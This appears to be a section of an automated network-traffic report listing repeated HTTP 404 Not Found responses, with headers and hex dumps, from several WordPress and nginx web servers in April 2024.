Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:14 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 3d 6b 73 db 46 92 9f a5 5f 01 c1 15 8b dc 00 20 08 3e f4 a4 52 b2 2c 3b de 8d 2d 97 2c 5f 6e 2b 4e a9 40 60 48 c2 06 01 04 00 f5 58 45 3f e8 fe c6 fd b2 eb 9e 19 bc 07 24 24 4a d9 6c 8e 65 53 c4 4c 4f 77 4f bf a6 e7 45 1e 6e bd 3e 3b b9 f8 e7 c7 53 69 16 cf dd a3 cd 43 fc 23 b9 a6 37 1d c9 c4 53 3f 7f 92 b1 8c 98 f6 d1 a6 04 af c3 39 89 4d 00 8d 03 95 fc b6 70 ae 46 f2 89 ef c5 c4 8b d5 8b db 80 c8 92 c5 9e 46 72 4c 6e e2 0e e2 3a 90 ac 99 19 46 24 1e 7d be 78 a3 ee ca 79 3c 9e 39 27 23 f9 ca 21 d7 81 1f c6 b9 d6 d7 8e 1d cf 46 36 b9 72 2c a2 d2 07 45 72 3c 27 76 4c 57 8d 2c d3 25 a3 ae a6 27 a8 5c c7 fb 26 85 c4 1d c9 81 e3 4d c7 a6 f5 4d 96 66 21 99 8c 64 e4 73 bf d3 f1 a7 0b cf 25 d7 64 62 ce 1d f7 56 f3 c3 a9 e6 4d 3b 37 73 37 0c 2c 2d 98 05 09 a2 d8 89 5d 72 f4 d1 9c 12 c9 f3 63 69 e2 2f 3c 5b 7a f9 62 d7 e8 76 0f a4 33 8e 44 7a 43 b1 1c 76 18 f4 66 ae 27 db a1 3f f6 e3 68 3b ed c7 f6 dc bc 51 9d 39 20 54 83 90 60 3f f7 5d 33 9c 92 6d a9 03 0d 53 be b7 6d 2f 42 80 09 89 ad d9 36 e3 7d bb 86 ed 66 4d 27 c0 40 a4 4d 7d 7f ea 12 33 70 22 cd f2 e7 a5 96 b2 e9 c6 24 f4 cc 18 b4 16 83 ee a0 20 08 5c c7 32 63 c7 f7 3a 61 14 7d 0f 02 82 2a ec e5 48 2e f5 5e 7a 19 9a bf 2d fc 03 e9 0d 21 76 5e da 51 ad b8 27 00 d9 91 9f 83 87 13 7f 3e 07 69 47 0f 60 c6 e2 4d f2 5c 45 56 e8 04 31 e7 83 9a ef 57 f3 ca 64 a5 60 21 9d bf 49 87 5b bf 9c bc 3e be 38 fe 45 fa 5b 67 f3 da f1 6c ff 5a bb bc 0e c8 dc ff ea 7c 22 71 0c d6 17 49 23 e9 4e 1e 9b 11 f9 1c ba f2 3e 67 e3 4b e7 4b 27 d2 ae 91 fa 97 0e b5 87 e8 0b f0 10 92 2f 1d da f8 4b a7 3b d0 74 ad f7 a5 b3 63 dc ec 18 5f 3a b2 22 03 03 d0 5e 0b bc 29 3c 44 57 d3 c7 e1 83 86 14 1b fc 3d 65 08 e1 13 3e fb 8b d0 22 f2 fe 9d 0c b6 0a f2 a6 cd 38 7e 8a 5e 28 b7 2f 9d eb 40 75 3c cb 5d d8 48 f1 6b 44 0b 68 5b 15 f4 49 a0 db da dc f1 b4 af d1 0f 57 24 1c 0d b5 81 66 c8 f7 f7 07 20 bc 2d e9 62 e6 44 d2 c4 71 89 04 7f cd 45 ec ab 53 e2 91 10 68 db 28 cf ad c9 c2 b3 50 ef 2d 47 f1 da 77 57 66 28 f9 4a a4 90 83 a4 5c b2 5a a4 7d 17 87 b7 b4 2e 1e dd 45 8b 00 c3 c6 05 89 e2 68 9f 28 b1 33 87 4f e6 3c d8 6f 79 e4 5a 7a 0d 88 db da 95 e9 2e c8 d9 a4 d5 be 3f 88 48 14 01 9a 4f b1 1f 82 c0 34 88 48 ef a0 db 2d 5f f9 fb a7 b3 0f 5a 14 87 a0 3e 67 72 db 8a db ed 7b 90 88 35 43 72 f7 f7 29 f9 a0 05 34 90 35 a2 59 d0 d5 f0 9c 58 71 4b 57 74 05 9e 4d 0f 2c 45 63 81 2a 7d 9c 11 67 3a 8b db 50 00 bd 76 2f 40 a1 ad 18 c0 f5 f6 01 eb 00 72 f9 d9 f1 e2 9e 71 1c 86 e6 6d 8b 68 53 e0 09 b5 09 bc 9b 4d 50 6b 36 00 b6 95 70 d4 5a 83 27 8f f2 a4 3c 15 37 ed 83 90 c4 8b d0 93 62 8d 80 11 dc b6 52 bd 8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:17 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 3d 6b 73 db 46 92 9f a5 5f 01 c1 15 8b dc 00 20 08 3e f4 a4 52 b2 2c 3b de 8d 2d 97 2c 5f 6e 2b 4e a9 40 60 48 c2 06 01 04 00 f5 58 45 3f e8 fe c6 fd b2 eb 9e 19 bc 07 24 24 4a d9 6c 8e 65 53 c4 4c 4f 77 4f bf a6 e7 45 1e 6e bd 3e 3b b9 f8 e7 c7 53 69 16 cf dd a3 cd 43 fc 23 b9 a6 37 1d c9 c4 53 3f 7f 92 b1 8c 98 f6 d1 a6 04 af c3 39 89 4d 00 8d 03 95 fc b6 70 ae 46 f2 89 ef c5 c4 8b d5 8b db 80 c8 92 c5 9e 46 72 4c 6e e2 0e e2 3a 90 ac 99 19 46 24 1e 7d be 78 a3 ee ca 79 3c 9e 39 27 23 f9 ca 21 d7 81 1f c6 b9 d6 d7 8e 1d cf 46 36 b9 72 2c a2 d2 07 45 72 3c 27 76 4c 57 8d 2c d3 25 a3 ae a6 27 a8 5c c7 fb 26 85 c4 1d c9 81 e3 4d c7 a6 f5 4d 96 66 21 99 8c 64 e4 73 bf d3 f1 a7 0b cf 25 d7 64 62 ce 1d f7 56 f3 c3 a9 e6 4d 3b 37 73 37 0c 2c 2d 98 05 09 a2 d8 89 5d 72 f4 d1 9c 12 c9 f3 63 69 e2 2f 3c 5b 7a f9 62 d7 e8 76 0f a4 33 8e 44 7a 43 b1 1c 76 18 f4 66 ae 27 db a1 3f f6 e3 68 3b ed c7 f6 dc bc 51 9d 39 20 54 83 90 60 3f f7 5d 33 9c 92 6d a9 03 0d 53 be b7 6d 2f 42 80 09 89 ad d9 36 e3 7d bb 86 ed 66 4d 27 c0 40 a4 4d 7d 7f ea 12 33 70 22 cd f2 e7 a5 96 b2 e9 c6 24 f4 cc 18 b4 16 83 ee a0 20 08 5c c7 32 63 c7 f7 3a 61 14 7d 0f 02 82 2a ec e5 48 2e f5 5e 7a 19 9a bf 2d fc 03 e9 0d 21 76 5e da 51 ad b8 27 00 d9 91 9f 83 87 13 7f 3e 07 69 47 0f 60 c6 e2 4d f2 5c 45 56 e8 04 31 e7 83 9a ef 57 f3 ca 64 a5 60 21 9d bf 49 87 5b bf 9c bc 3e be 38 fe 45 fa 5b 67 f3 da f1 6c ff 5a bb bc 0e c8 dc ff ea 7c 22 71 0c d6 17 49 23 e9 4e 1e 9b 11 f9 1c ba f2 3e 67 e3 4b e7 4b 27 d2 ae 91 fa 97 0e b5 87 e8 0b f0 10 92 2f 1d da f8 4b a7 3b d0 74 ad f7 a5 b3 63 dc ec 18 5f 3a b2 22 03 03 d0 5e 0b bc 29 3c 44 57 d3 c7 e1 83 86 14 1b fc 3d 65 08 e1 13 3e fb 8b d0 22 f2 fe 9d 0c b6 0a f2 a6 cd 38 7e 8a 5e 28 b7 2f 9d eb 40 75 3c cb 5d d8 48 f1 6b 44 0b 68 5b 15 f4 49 a0 db da dc f1 b4 af d1 0f 57 24 1c 0d b5 81 66 c8 f7 f7 07 20 bc 2d e9 62 e6 44 d2 c4 71 89 04 7f cd 45 ec ab 53 e2 91 10 68 db 28 cf ad c9 c2 b3 50 ef 2d 47 f1 da 77 57 66 28 f9 4a a4 90 83 a4 5c b2 5a a4 7d 17 87 b7 b4 2e 1e dd 45 8b 00 c3 c6 05 89 e2 68 9f 28 b1 33 87 4f e6 3c d8 6f 79 e4 5a 7a 0d 88 db da 95 e9 2e c8 d9 a4 d5 be 3f 88 48 14 01 9a 4f b1 1f 82 c0 34 88 48 ef a0 db 2d 5f f9 fb a7 b3 0f 5a 14 87 a0 3e 67 72 db 8a db ed 7b 90 88 35 43 72 f7 f7 29 f9 a0 05 34 90 35 a2 59 d0 d5 f0 9c 58 71 4b 57 74 05 9e 4d 0f 2c 45 63 81 2a 7d 9c 11 67 3a 8b db 50 00 bd 76 2f 40 a1 ad 18 c0 f5 f6 01 eb 00 72 f9 d9 f1 e2 9e 71 1c 86 e6 6d 8b 68 53 e0 09 b5 09 bc 9b 4d 50 6b 36 00 b6 95 70 d4 5a 83 27 8f f2 a4 3c 15 37 ed 83 90 c4 8b d0 93 62 8d 80 11 dc b6 52 bd 8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:18 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:21 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:23 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:26 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 